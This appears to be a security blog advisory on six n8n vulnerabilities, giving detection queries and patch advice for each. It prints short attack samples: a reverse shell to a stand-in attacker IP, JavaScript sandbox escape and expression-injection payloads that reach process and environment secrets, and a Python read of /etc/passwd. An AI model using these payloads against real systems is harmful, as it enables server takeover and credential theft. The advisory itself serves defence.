Critical Security Alert: Multiple Zero-Day-Style Flaws in n8n Could Allow Full Server Takeover — Immediate Patching Strongly Advised

Aegiron 11 mins0

Product Overview

Product: n8n
Vendor: n8n GmbH
Type: Workflow Automation & Integration Platform
Core Technology: Node.js (TypeScript), Express backend, SQLite/PostgreSQL, optional Redis queue
Execution Capability: JavaScript expressions, custom JavaScript Code Node, Python Code Node, File system interaction

n8n is widely deployed in self-hosted environments and cloud instances to automate integrations between internal systems, SaaS applications, and infrastructure services. Because workflows may execute custom code and interact directly with the host file system, the application inherently operates with high privilege on the underlying system.

The following vulnerabilities impact core workflow execution, expression handling, sandboxing mechanisms, file access controls, and UI rendering. In misconfigured or internet-exposed deployments, these issues may result in full server compromise.

Vulnerability Summary Table

CVETitleCVSS (Estimated)SeverityAttack VectorAuthentication RequiredExploit Availability
CVE-2026-27498RCE via Read/Write Files + Git chaining9.8CriticalRemoteYesPublic PoC (educational)
CVE-2026-27495Sandbox Escape → Host Compromise9.9CriticalRemoteYesTechnical details public
CVE-2026-27577Expression Evaluation → Command Execution9.6CriticalRemoteYesExploitation technique known
CVE-2026-27493Unauthenticated Expression Execution (Form Node)9.8CriticalRemoteNoExploited in testing scenarios
CVE-2026-27578Stored XSS → Session Hijacking8.1HighRemoteYesProof of concept available
CVE-2026-27494Arbitrary File Read via Python Code Node8.4HighRemoteYesLimited PoC

CVE-2026-27498

Remote Code Execution via Read/Write Files Node and Git Chaining

Overview

Improper path validation and insufficient execution control in the Read/Write Files node allowed arbitrary file creation and modification. When chained with Git-based workflow functionality, malicious scripts could be introduced and executed on the host system.

The vulnerability arises from insufficient directory restrictions and the ability to interact with Git repositories inside workflows.

Technical Details

It was possible for a workflow to:

  • Write arbitrary content to system-accessible directories
  • Create or modify Git hooks (e.g., post-checkout, post-merge)
  • Trigger execution of malicious scripts via Git operations
  • Place executable payloads in runtime directories

Because n8n runs under Node.js with host-level access, any arbitrary file write may lead to command execution.

Educational PoC Concept

The following illustrates a reverse shell concept used in controlled lab testing:

bash -i >& /dev/tcp/attacker-ip/4444 0>&1

If written into a Git hook and triggered, command execution would occur.

Impact

  • Full remote code execution
  • Container breakout (if improperly isolated)
  • Credential theft from environment variables
  • Lateral movement inside internal networks

MITRE ATT&CK Mapping

  • T1059 – Command and Scripting Interpreter
  • T1105 – Ingress Tool Transfer
  • T1574 – Hijack Execution Flow

Detection

Indicators of Compromise

  • Unexpected .git directories created by workflows
  • File writes to /etc/, /root/, /usr/, or application runtime paths
  • n8n spawning bash, sh, curl, wget, or nc
  • Outbound network connections to unknown IP addresses

Detection Queries

Splunk

index=os_logs process_name=node parent_process=n8n
(command="bash" OR command="sh" OR command="curl" OR command="wget")
index=os_logs file_path IN ("/etc/*","/root/*","/usr/*")
process_name=node

Elastic (KQL)

process.parent.name : "node" AND process.name : ("bash" OR "sh" OR "curl" OR "wget")
file.path : ("/etc/*" OR "/root/*" OR "/usr/*") AND process.name : "node"

Microsoft Sentinel (KQL)

SecurityEvent
| where ParentProcessName contains "node"
| where Process has_any ("bash","sh","curl","wget")

Official Patch

Upgrade to the latest patched release:
https://github.com/n8n-io/n8n/releases

Docker users should pull the newest official image.

CVE-2026-27495

Sandbox Escape Leading to Full Host Compromise

Overview

The JavaScript sandbox responsible for isolating user expressions was found to be bypassable. By abusing JavaScript constructor chains, access to the Node.js runtime was obtained.

Technical Details

The sandbox failed to properly restrict prototype access. The following pattern was used in controlled testing:

this.constructor.constructor('return process')()

Once access to process was achieved, system command execution became possible:

require('child_process').exec('id')

Impact

  • Full RCE
  • Access to system-level modules
  • Privilege escalation
  • Host compromise

Detection

Indicators

  • Expressions containing constructor.constructor
  • Use of require('child_process') in workflow JSON
  • Node.js spawning shell processes

Detection Queries

Splunk

index=app_logs "constructor.constructor"
index=os_logs parent_process=node process_name IN ("bash","sh")

Elastic

message : "constructor.constructor"

Sentinel

AppTraces
| where Message contains "constructor.constructor"

Official Patch

Upgrade immediately:
https://github.com/n8n-io/n8n/releases

CVE-2026-27577

Arbitrary Command Execution via Expression Evaluation

Overview

The expression engine evaluated user-controlled input inside {{ }} blocks without sufficient sanitization. Arbitrary JavaScript execution was possible.

Attack Scenario

A malicious workflow could contain:

{{$json["data"].constructor.constructor("return process")()}}

This led to access to Node internals and command execution.

Impact

  • RCE
  • Data exfiltration
  • Persistent backdoor implantation

Detection

Indicators

  • Workflow exports containing suspicious JavaScript
  • Expressions referencing process, mainModule, or child_process
  • Unexpected outbound connections

Detection Queries

Splunk

index=app_logs ("child_process" OR "mainModule" OR "process.env")

Elastic

message : ("child_process" OR "mainModule" OR "process.env")

Official Patch

Patched in current stable version:
https://github.com/n8n-io/n8n/releases

CVE-2026-27493

Unauthenticated Expression Execution via Form Node

Overview

The Form Node accepted public input that was evaluated inside workflow expressions without authentication checks. This allowed remote attackers to execute arbitrary expressions.

Exploitation Scenario

An attacker could submit:

{{constructor.constructor("return process")().env}}

Environment variables containing credentials would be exposed.

Impact

  • Unauthenticated RCE
  • Secret exposure
  • API key compromise

Detection

Indicators

  • Suspicious POST requests to form endpoints
  • High volume requests containing {{
  • Workflow execution triggered by anonymous IPs

Detection Queries

Splunk

index=web_logs method=POST uri_path="/form/*" "{{"

Elastic

http.request.method : "POST" AND url.path : "/form/*" AND message : "{{"

Official Patch

Upgrade to latest version:
https://github.com/n8n-io/n8n/releases

CVE-2026-27578

Stored Cross-Site Scripting in Workflow Metadata

Overview

Improper output encoding in workflow names and descriptions allowed script injection. When viewed by an administrator, malicious JavaScript executed in the browser.

Impact

  • Session cookie theft
  • Admin account takeover
  • Workflow manipulation

Detection

Indicators

  • <script> tags inside workflow names
  • Suspicious outbound HTTP requests from admin browsers
  • Unexpected admin sessions from new IP addresses

Detection Queries

Splunk

index=app_logs "<script>"

Elastic

message : "<script>"

Official Patch

Upgrade UI components via latest release:
https://github.com/n8n-io/n8n/releases

CVE-2026-27494

Arbitrary File Read via Python Code Node

Overview

The Python Code Node executed without file system restrictions. Sensitive system files could be accessed.

Exploitation (Educational)

with open('/etc/passwd') as f:
    print(f.read())

Impact

  • Credential disclosure
  • Infrastructure reconnaissance
  • Further attack staging

Detection

Indicators

  • Python node execution accessing /etc/, /proc/, /root/
  • Large response payloads from workflows
  • Repeated file read attempts

Detection Queries

Splunk

index=os_logs process_name=python parent_process=node file_path="/etc/*"

Elastic

process.name : "python" AND file.path : "/etc/*"

Official Patch

Upgrade to latest patched version:
https://github.com/n8n-io/n8n/releases

Immediate Remediation Actions

  • Upgrade to latest n8n version immediately
  • Restrict public exposure behind VPN or identity proxy
  • Disable Code and Python nodes if unnecessary
  • Run as non-root user
  • Enforce outbound firewall rules
  • Rotate all stored credentials
  • Monitor workflow imports

Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.